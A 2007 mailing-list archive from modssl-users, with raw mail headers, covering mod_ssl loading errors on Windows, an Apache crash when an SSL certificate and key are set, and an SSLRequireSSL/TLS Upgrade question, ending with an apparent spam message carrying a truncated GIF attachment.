Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This list is about mod_ssl under Apache 1.3.xx, just like modssl.org
said it was. Furthermore as the apache website states, mod_ssl is now
part of Apache 2.x thus the support would be there.

On 2/15/07, Andrew Madu  wrote:
> Operating system: Windows XP Professional
> Version: 2002
> Service Pack: 2
>
> Apache HTTP version: 2.2.4 (Binary)
>
> Syntax error on line 114 of httpd.conf:
> Cannot load mod_ssl.so into server: The operating system cannot run %1
>
> Of course line 114 in my httpd.conf document is:
> LoadModule ssl_module modules/mod_ssl.so
>
> The mod_ssl.so module is situated in C:\Program Files\Apache Software
> Foundation\Apache2.2\modules.
>
> What is the issue here and how can I best resolve it?
>
> --
> Regards
>
> Andrew
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 15 19:28:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 46A2F14D89B; Thu, 15 Feb 2007 19:28:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.170])
	by master.modssl.org (Postfix) with ESMTP id DE5D414D82B
	for ; Thu, 15 Feb 2007 19:28:16 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so6796ugb
        for ; Thu, 15 Feb 2007 10:27:43 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=lI1xiJ2+R4TGessGkniq2DDTIqgI8PxledvuDzoybqA7MxxL020xtADBfJICguv3ihxWuBAyzYtXtGFNSC9n04k+xFls0oyeebKEN6kh0pRpAsOzcoc4SOt/Zrz4BOt2gkAIcyCJvODc1S60s7ujhVRb7QLX6x9WqTFTjBzBi/4=
Received: by 10.78.122.11 with SMTP id u11mr478806huc.1171564062958;
        Thu, 15 Feb 2007 10:27:42 -0800 (PST)
Received: by 10.78.81.2 with HTTP; Thu, 15 Feb 2007 10:27:42 -0800 (PST)
Message-ID: 
Date: Thu, 15 Feb 2007 18:27:42 +0000
From: "Andrew Madu" 
To: modssl-users@modssl.org
Subject: Re: Cannot load mod_ssl.so into server: The operating system cannot run %1
In-Reply-To: <740f716a0702150804y12ce0c3fp407b8466d4da046c@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_109426_302767.1171564062929"
References: 
	 <740f716a0702150804y12ce0c3fp407b8466d4da046c@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Madu" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_109426_302767.1171564062929
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

Furthermore as the apache website states, mod_ssl is now
> part of Apache 2.x thus the support would be there.


Well whatever it may say in the documentation I can confirm that the
mod_ssl.so molue is definately not being created during the binary build.

Does anyone know where I can get win32 help for mod_ssl?

--
Regards

Andrew

------=_Part_109426_302767.1171564062929
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

Furthermore as the apache website states, mod_ssl is now
part of Apache 2.x
 thus the support would be there.

Well whatever it may say in the documentation I can confirm that the mod_ssl.so molue is definately not being created during the binary build.

Does anyone know where I can get win32 help for mod_ssl?


--
Regards

Andrew




------=_Part_109426_302767.1171564062929--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 16 07:51:14 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CCE814D87B; Fri, 16 Feb 2007 07:51:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.238])
	by master.modssl.org (Postfix) with ESMTP id 0151E14D83E
	for ; Fri, 16 Feb 2007 07:51:13 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id s7so811273wxc
        for ; Thu, 15 Feb 2007 22:50:43 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=cdY6Cu1tJSi6jzSXEX3g5akgEFuj8f7dEDxluqJuKNJMLWLY23ptXStnbxfoiGaOCh+4OeNi4ROjGkAfxR0fItIvzK5NIoaDYNaz04HOzIiCn5Vhd6WYngJaofmBSnRoSE4ZtwLH+JGU0A5Q/j47+6zwNYULV1G2yh/w76+h+Y0=
Received: by 10.90.118.8 with SMTP id q8mr3691073agc.1171608643273;
        Thu, 15 Feb 2007 22:50:43 -0800 (PST)
Received: by 10.90.88.10 with HTTP; Thu, 15 Feb 2007 22:50:43 -0800 (PST)
Message-ID: <1e053be60702152250k30ffe500g8d6aa9bc903be42b@mail.gmail.com>
Date: Fri, 16 Feb 2007 01:50:43 -0500
From: "Brian Gordon" 
To: modssl-users@modssl.org
Subject: Installing Apache + SSL on Windows
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Gordon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've been trying for ages to get my server running SSL successfully. I
don't need port 80 (unencrypted traffic) at all, just 411.

I have the module set up just fine, and apache runs fine unless I
define a valid cert and key:

SSLCertificateFile pw/my-server.cert
SSLCertificateKeyFile pw/my-server.key

These are unencrypted (win32 doesn't support encrypted keys) SSL keys
that are valid for apache (when they're not valid it tells me so and
refuses to load them). But when I have these defined, and I start
apache, the "starting apache" console window comes up and takes longer
than usual, then just crashes and the vista "Apache HTTP server
stopped working and was closed" window comes up.

This is the entire debug log for an attempted start:

[Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of entropy
[Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
SSL-aware server
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_pphrase.c(469):
unencrypted RSA private key - pass phrase not required
[Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary RSA
private keys (512/1024 bits)
[Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary DH
parameters (512/1024 bits)
[Fri Feb 16 01:29:29 2007] [info] Init: Initializing (virtual) servers for SSL
[Fri Feb 16 01:29:29 2007] [info] Configuring server for SSL protocol
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(405): Creating
new SSL context (protocols: SSLv2, SSLv3, TLSv1)
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(729): Configuring
RSA server certificate
[Fri Feb 16 01:29:29 2007] [warn] RSA server certificate CommonName
(CN) `163.11.110.152:443' does NOT match server name!?
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(768): Configuring
RSA server private key
[Fri Feb 16 01:29:29 2007] [info] Server: Apache/2.2.3, Interface:
mod_ssl/2.2.3, Library: OpenSSL/0.9.8d
[Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of entropy
[Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
SSL-aware server

It abruptly ends at that last line.

This is the relevant section from my httpd.conf. It's basically
identical to ssl.conf and including that doesn't make a difference.
And like I said, if I just take out those two cert/key lines then it
will start fine (but of course tell me that there's no way ssl will
work without a certificate).

#SSL

Listen 163.11.110.152:443

AddType application/x-x509-ca-cert .cert
AddType application/x-pkcs7-crl    .crl

SSLMutex default
SSLRandomSeed startup builtin
SSLSessionCache none

LogLevel debug


SSLEngine On
SSLCertificateFile pw/my-server.cert
SSLCertificateKeyFile pw/my-server.key


Does anyone know what's going on? I see hundreds of success stories
around the internet about making the key file unencrypted, but mine is
already unencrypted. Also it's Listening on a specific IP address,
something that helped some other people. What else is there left ot
try?

-- 
Brian Gordon
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 16 18:44:11 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E875214D873; Fri, 16 Feb 2007 18:44:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.236])
	by master.modssl.org (Postfix) with ESMTP id 5376F14D83E
	for ; Fri, 16 Feb 2007 18:44:10 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id s7so948169wxc
        for ; Fri, 16 Feb 2007 09:43:39 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=XITBVoHfziixnmGr2xYoXkjph+bPvhc3oDIUrP0BMucp4+mO9RAswf3Kq+kv8vAXS/qr2OeviglUWs0KtLLktdfGtiu6d3Z5DBQGGqtQ5tnF4XRvrmqGFEDxDksAEv93LX6FIdrS1Wevz+UnHvTFINEjMnT74r1Qm/D55fbvElU=
Received: by 10.70.80.14 with SMTP id d14mr5818519wxb.1171647818735;
        Fri, 16 Feb 2007 09:43:38 -0800 (PST)
Received: by 10.49.85.6 with HTTP; Fri, 16 Feb 2007 09:43:38 -0800 (PST)
Message-ID: 
Date: Fri, 16 Feb 2007 12:43:38 -0500
From: "Xian Xian" 
To: modssl-users@modssl.org
Subject: Re: Installing Apache + SSL on Windows
In-Reply-To: <1e053be60702152250k30ffe500g8d6aa9bc903be42b@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_6285_13851937.1171647818451"
References: <1e053be60702152250k30ffe500g8d6aa9bc903be42b@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xian Xian" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_6285_13851937.1171647818451
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Brian,
You'd better to redo a key file and crt file. Remove the pass phrase from
the key file. Good luck!
Xian


On 2/16/07, Brian Gordon  wrote:
>
> I've been trying for ages to get my server running SSL successfully. I
> don't need port 80 (unencrypted traffic) at all, just 411.
>
> I have the module set up just fine, and apache runs fine unless I
> define a valid cert and key:
>
> SSLCertificateFile pw/my-server.cert
> SSLCertificateKeyFile pw/my-server.key
>
> These are unencrypted (win32 doesn't support encrypted keys) SSL keys
> that are valid for apache (when they're not valid it tells me so and
> refuses to load them). But when I have these defined, and I start
> apache, the "starting apache" console window comes up and takes longer
> than usual, then just crashes and the vista "Apache HTTP server
> stopped working and was closed" window comes up.
>
> This is the entire debug log for an attempted start:
>
> [Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of
> entropy
> [Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
> SSL-aware server
> [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_pphrase.c(469):
> unencrypted RSA private key - pass phrase not required
> [Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary RSA
> private keys (512/1024 bits)
> [Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary DH
> parameters (512/1024 bits)
> [Fri Feb 16 01:29:29 2007] [info] Init: Initializing (virtual) servers for
> SSL
> [Fri Feb 16 01:29:29 2007] [info] Configuring server for SSL protocol
> [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(405): Creating
> new SSL context (protocols: SSLv2, SSLv3, TLSv1)
> [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(729): Configuring
> RSA server certificate
> [Fri Feb 16 01:29:29 2007] [warn] RSA server certificate CommonName
> (CN) `163.11.110.152:443' does NOT match server name!?
> [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(768): Configuring
> RSA server private key
> [Fri Feb 16 01:29:29 2007] [info] Server: Apache/2.2.3, Interface:
> mod_ssl/2.2.3, Library: OpenSSL/0.9.8d
> [Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of
> entropy
> [Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
> SSL-aware server
>
> It abruptly ends at that last line.
>
> This is the relevant section from my httpd.conf. It's basically
> identical to ssl.conf and including that doesn't make a difference.
> And like I said, if I just take out those two cert/key lines then it
> will start fine (but of course tell me that there's no way ssl will
> work without a certificate).
>
> #SSL
>
> Listen 163.11.110.152:443
>
> AddType application/x-x509-ca-cert .cert
> AddType application/x-pkcs7-crl    .crl
>
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLSessionCache none
>
> LogLevel debug
>
> 
> SSLEngine On
> SSLCertificateFile pw/my-server.cert
> SSLCertificateKeyFile pw/my-server.key
> 
>
> Does anyone know what's going on? I see hundreds of success stories
> around the internet about making the key file unencrypted, but mine is
> already unencrypted. Also it's Listening on a specific IP address,
> something that helped some other people. What else is there left ot
> try?
>
> --
> Brian Gordon
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_Part_6285_13851937.1171647818451
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Brian,


You'd better to redo a key file and crt file. Remove the pass phrase from the key file. Good luck!


Xian

 


On 2/16/07, Brian Gordon <bgordon0@gmail.com> wrote:

I've been trying for ages to get my server running SSL successfully. I
don't need port 80 (unencrypted traffic) at all, just 411.


I have the module set up just fine, and apache runs fine unless I
define a valid cert and key:

SSLCertificateFile pw/my-server.cert
SSLCertificateKeyFile pw/my-server.key

These are unencrypted (win32 doesn't support encrypted keys) SSL keys

that are valid for apache (when they're not valid it tells me so and
refuses to load them). But when I have these defined, and I start
apache, the "starting apache" console window comes up and takes longer

than usual, then just crashes and the vista "Apache HTTP server
stopped working and was closed" window comes up.

This is the entire debug log for an attempted start:

[Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of entropy

[Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
SSL-aware server
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_pphrase.c(469):
unencrypted RSA private key - pass phrase not required

[Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary RSA
private keys (512/1024 bits)
[Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary DH
parameters (512/1024 bits)
[Fri Feb 16 01:29:29 2007] [info] Init: Initializing (virtual) servers for SSL

[Fri Feb 16 01:29:29 2007] [info] Configuring server for SSL protocol
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(405): Creating
new SSL context (protocols: SSLv2, SSLv3, TLSv1)
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(729): Configuring

RSA server certificate
[Fri Feb 16 01:29:29 2007] [warn] RSA server certificate CommonName
(CN) `163.11.110.152:443' does NOT match server name!?
[Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(768): Configuring

RSA server private key
[Fri Feb 16 01:29:29 2007] [info] Server: Apache/2.2.3, Interface:
mod_ssl/2.2.3, Library: OpenSSL/0.9.8d
[Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of entropy

[Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
SSL-aware server

It abruptly ends at that last line.

This is the relevant section from my httpd.conf. It's basically
identical to 
ssl.conf and including that doesn't make a difference.
And like I said, if I just take out those two cert/key lines then it
will start fine (but of course tell me that there's no way ssl will
work without a certificate).


#SSL

Listen 163.11.110.152:443

AddType application/x-x509-ca-cert .cert
AddType application/x-pkcs7-crl    .crl

SSLMutex default
SSLRandomSeed startup builtin

SSLSessionCache none

LogLevel debug

<VirtualHost 163.11.110.152:443>
SSLEngine On
SSLCertificateFile pw/my-server.cert
SSLCertificateKeyFile pw/my-server.key

</VirtualHost>

Does anyone know what's going on? I see hundreds of success stories
around the internet about making the key file unencrypted, but mine is
already unencrypted. Also it's Listening on a specific IP address,

something that helped some other people. What else is there left ot
try?

--
Brian Gordon
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            
majordomo@modssl.org



------=_Part_6285_13851937.1171647818451--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 16 19:59:41 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CFB6414D873; Fri, 16 Feb 2007 19:59:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.237])
	by master.modssl.org (Postfix) with ESMTP id 4AF1614D83E
	for ; Fri, 16 Feb 2007 19:59:40 +0100 (CET)
Received: by wx-out-0506.google.com with SMTP id s7so967084wxc
        for ; Fri, 16 Feb 2007 10:59:10 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=kxygLEUe2wyh5ZTCgwC1FezlzocXBFVg7MjgsF5YgiB5zItJSInjJ9g9J0GjvRVQubSvAcYtO4FDbFUiQjaM1LjyTAr2oOpnkWDp7nayDz9WPwfwxa1pLe4bIBe7dw2g1iDy7ES0SrP6WRsxuI5Yi0CLajiDMowYyK3UwnUoKkI=
Received: by 10.90.102.20 with SMTP id z20mr4590702agb.1171652349965;
        Fri, 16 Feb 2007 10:59:09 -0800 (PST)
Received: by 10.90.88.10 with HTTP; Fri, 16 Feb 2007 10:59:09 -0800 (PST)
Message-ID: <1e053be60702161059j5c089676h1329f11c2a784068@mail.gmail.com>
Date: Fri, 16 Feb 2007 13:59:09 -0500
From: "Brian Gordon" 
To: modssl-users@modssl.org
Subject: Re: Installing Apache + SSL on Windows
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <1e053be60702152250k30ffe500g8d6aa9bc903be42b@mail.gmail.com>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Gordon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There is no pass phrase on the key file. I've redone the key and crt
several times; it always asks me for a passphrase at some point but I
think that at the end of the process nothing is encrypted

On 2/16/07, Xian Xian  wrote:
> Brian,
> You'd better to redo a key file and crt file. Remove the pass phrase from
> the key file. Good luck!
> Xian
>
>
> On 2/16/07, Brian Gordon  wrote:
> >
> > I've been trying for ages to get my server running SSL successfully. I
> > don't need port 80 (unencrypted traffic) at all, just 411.
> >
> > I have the module set up just fine, and apache runs fine unless I
> > define a valid cert and key:
> >
> > SSLCertificateFile pw/my-server.cert
> > SSLCertificateKeyFile pw/my-server.key
> >
> > These are unencrypted (win32 doesn't support encrypted keys) SSL keys
> > that are valid for apache (when they're not valid it tells me so and
> > refuses to load them). But when I have these defined, and I start
> > apache, the "starting apache" console window comes up and takes longer
> > than usual, then just crashes and the vista "Apache HTTP server
> > stopped working and was closed" window comes up.
> >
> > This is the entire debug log for an attempted start:
> >
> > [Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of
> entropy
> > [Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
> > SSL-aware server
> > [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_pphrase.c(469):
> > unencrypted RSA private key - pass phrase not required
> > [Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary RSA
> > private keys (512/1024 bits)
> > [Fri Feb 16 01:29:29 2007] [info] Init: Generating temporary DH
> > parameters (512/1024 bits)
> > [Fri Feb 16 01:29:29 2007] [info] Init: Initializing (virtual) servers for
> SSL
> > [Fri Feb 16 01:29:29 2007] [info] Configuring server for SSL protocol
> > [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(405): Creating
> > new SSL context (protocols: SSLv2, SSLv3, TLSv1)
> > [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(729): Configuring
> > RSA server certificate
> > [Fri Feb 16 01:29:29 2007] [warn] RSA server certificate CommonName
> > (CN) `163.11.110.152:443' does NOT match server name!?
> > [Fri Feb 16 01:29:29 2007] [debug] ssl_engine_init.c(768): Configuring
> > RSA server private key
> > [Fri Feb 16 01:29:29 2007] [info] Server: Apache/2.2.3, Interface:
> > mod_ssl/2.2.3, Library: OpenSSL/0.9.8d
> > [Fri Feb 16 01:29:29 2007] [info] Init: Seeding PRNG with 136 bytes of
> entropy
> > [Fri Feb 16 01:29:29 2007] [info] Loading certificate & private key of
> > SSL-aware server
> >
> > It abruptly ends at that last line.
> >
> > This is the relevant section from my httpd.conf. It's basically
> > identical to ssl.conf and including that doesn't make a difference.
> > And like I said, if I just take out those two cert/key lines then it
> > will start fine (but of course tell me that there's no way ssl will
> > work without a certificate).
> >
> > #SSL
> >
> > Listen 163.11.110.152:443
> >
> > AddType application/x-x509-ca-cert .cert
> > AddType application/x-pkcs7-crl    .crl
> >
> > SSLMutex default
> > SSLRandomSeed startup builtin
> > SSLSessionCache none
> >
> > LogLevel debug
> >
> > 
> > SSLEngine On
> > SSLCertificateFile pw/my-server.cert
> > SSLCertificateKeyFile pw/my-server.key
> > 
> >
> > Does anyone know what's going on? I see hundreds of success stories
> > around the internet about making the key file unencrypted, but mine is
> > already unencrypted. Also it's Listening on a specific IP address,
> > something that helped some other people. What else is there left ot
> > try?
> >
> > --
> > Brian Gordon
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> >
>
>


-- 
Brian Gordon
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 16 20:24:19 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C80E714D873; Fri, 16 Feb 2007 20:24:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from poy.chewa.net (poy.chewa.net [194.242.114.73])
	by master.modssl.org (Postfix) with ESMTP id 817C914D83E
	for ; Fri, 16 Feb 2007 20:24:19 +0100 (CET)
Received: from auguste.remlab.net (unknown [IPv6:2002:52b5:db9:0:20d:60ff:fe38:6d16])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	(Authenticated sender: remi)
	by poy.chewa.net (Postfix) with ESMTP id 4FE709647A
	for ; Fri, 16 Feb 2007 20:23:49 +0100 (CET)
From: =?utf-8?q?R=C3=A9mi_Denis-Courmont?= 
Organization: SimPhalempin.Com
To: modssl-users@modssl.org
Subject: SSLEngine optional and SSLRequireSSL ?
Date: Fri, 16 Feb 2007 21:23:34 +0200
User-Agent: KMail/1.9.5
MIME-Version: 1.0
Content-Type: multipart/signed;
  boundary="nextPart1988061.SKRnglagLZ";
  protocol="application/pgp-signature";
  micalg=pgp-sha1
Content-Transfer-Encoding: 7bit
Message-Id: <200702162123.37332@auguste.remlab.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?utf-8?q?R=C3=A9mi_Denis-Courmont?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--nextPart1988061.SKRnglagLZ
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

	Hello,

It seems that SSLRequireSSL prevents TLS Upgrade from working at all, or=20
I got something wrong. Still, I have not been able to find out how to=20
force TLS Upgrade on a SSLEngine optional... If I use SSLRequireSSL,=20
Apache will properly return 426 whenever a client performs an=20
unencrypted request, but that will block the TLS Upgrade request itself=20
too (since it is not encrypted either).

I've tried that but that does not seem to work either (plus I am not=20
sure if allowing unencryted OPTIONS is actually safe):

	SSLRequireSSL


This is a sample:

OPTIONS * HTTP/1.1
Host: www.example.com
Upgrade: TLS/1.0
Connection: Upgrade

HTTP/1.1 426 Upgrade Required
Date: Fri, 16 Feb 2007 18:54:30 GMT
Server: Apache/2.2
Upgrade: TLS/1.0, HTTP/1.1
Connection: Upgrade
Content-Length: 459
=2E..

Has anyone been able to work around this chicken-and-egg problem?

Regards,

=2D-=20
R=C3=A9mi Denis-Courmont
http://www.remlab.net/

--nextPart1988061.SKRnglagLZ
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iEYEABECAAYFAkXWBLkACgkQw+xtvt1tEr21nQCfeVfIftpSwd9CPPcJsKdMoXg2
TAsAn25uIdyn7Bzi7eKFo6UyKRW3M6oC
=qzq7
-----END PGP SIGNATURE-----

--nextPart1988061.SKRnglagLZ--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 17 16:56:35 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DAC1314D869; Sat, 17 Feb 2007 16:56:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 4539214D82F
	for ; Sat, 17 Feb 2007 16:56:34 +0100 (CET)
Date: Sat, 17 Feb 2007 11:09:20 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
